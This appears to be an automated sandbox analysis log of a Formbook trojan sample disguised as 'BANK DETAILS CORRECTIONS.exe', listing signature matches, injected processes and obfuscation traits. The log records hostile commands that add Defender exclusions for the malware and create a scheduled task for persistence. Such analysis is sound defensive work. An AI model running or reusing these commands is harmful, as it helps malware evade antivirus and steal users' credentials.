Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: rasadhlp.dll
Uses 32bit PE files
Source: BANK DETAILS CORRECTIONS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: BANK DETAILS CORRECTIONS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fcLfLlfpmjf.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: _0020.SetAccessControl
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: _0020.AddAccessRule
Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: _0020.SetAccessControl
Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs Security API names: _0020.AddAccessRule
Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, fe1LJPaDf5VFXiQOsV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, fe1LJPaDf5VFXiQOsV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7660000.5.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dfaee8.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 13.2.fcLfLlfpmjf.exe.28caec8.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/16@17/14
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Mutant created: \Sessions\1\BaseNamedObjects\ilxsEXzxkgHfQTaf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File created: C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp Jump to behavior
Source: BANK DETAILS CORRECTIONS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BANK DETAILS CORRECTIONS.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BANK DETAILS CORRECTIONS.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File read: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: BANK DETAILS CORRECTIONS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BANK DETAILS CORRECTIONS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: BANK DETAILS CORRECTIONS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnKifmZDGZ.exe, 00000011.00000002.3731777625.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383056576.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3731787865.00000000001CE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: hBWP.pdbSHA256 source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
Source: Binary string: wntdll.pdb source: BANK DETAILS CORRECTIONS.exe, BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1420258806.0000000004297000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1415103726.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3734603384.0000000004440000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1512263789.00000000048A4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000003.1510099441.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000018.00000002.1517559243.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdb source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: hBWP.pdb source: BANK DETAILS CORRECTIONS.exe, fcLfLlfpmjf.exe.0.dr
Source: Binary string: firefox.pdb source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdbGCTL source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733392609.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 00000014.00000002.1510220095.0000000001088000.00000004.00000020.00020000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000002.3733440957.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: BANK DETAILS CORRECTIONS.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: fcLfLlfpmjf.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.BANK DETAILS CORRECTIONS.exe.7f50000.6.raw.unpack, GUMbEE00TLA92cGkmO.cs .Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.cs .Net Code: uicrufJqQL System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: BANK DETAILS CORRECTIONS.exe Static PE information: 0x9354E9B9 [Wed Apr 29 23:26:49 2048 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_0135F1B0 push eax; iretd 0_2_0135F1B1
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_0135756A push eax; iretd 0_2_01357589
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 0_2_076D3932 pushad ; retf 0_2_076D3939
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0042F052 push eax; ret 12_2_0042F054
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_004020F2 pushad ; retf 12_2_004020F8
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00414893 push esi; ret 12_2_0041489E
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_004248A3 push es; ret 12_2_00424A38
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00407397 push ecx; ret 12_2_0040739A
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00403600 push eax; ret 12_2_00403602
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0040773B push esp; retf 12_2_00407743
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019209AD push ecx; mov dword ptr [esp], ecx 12_2_019209B6
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04BC756A push eax; iretd 13_2_04BC7589
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04D238F0 pushad ; iretd 13_2_04D238F1
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_04D23938 pushfd ; iretd 13_2_04D23939
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F83932 pushad ; retf 13_2_06F83939
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0155C54D pushfd ; ret 20_2_0155C54E
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0155C54F push 8B014E67h; ret 20_2_0155C554
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0155C9D7 push edi; ret 20_2_0155C9D9
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015109AD push ecx; mov dword ptr [esp], ecx 20_2_015109B6
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_014E135E push eax; iretd 20_2_014E1369
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_014E1FEC push eax; iretd 20_2_014E1FED
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01567E99 push ecx; ret 20_2_01567EAC
Source: BANK DETAILS CORRECTIONS.exe Static PE information: section name: .text entropy: 7.989685826785
Source: fcLfLlfpmjf.exe.0.dr Static PE information: section name: .text entropy: 7.989685826785
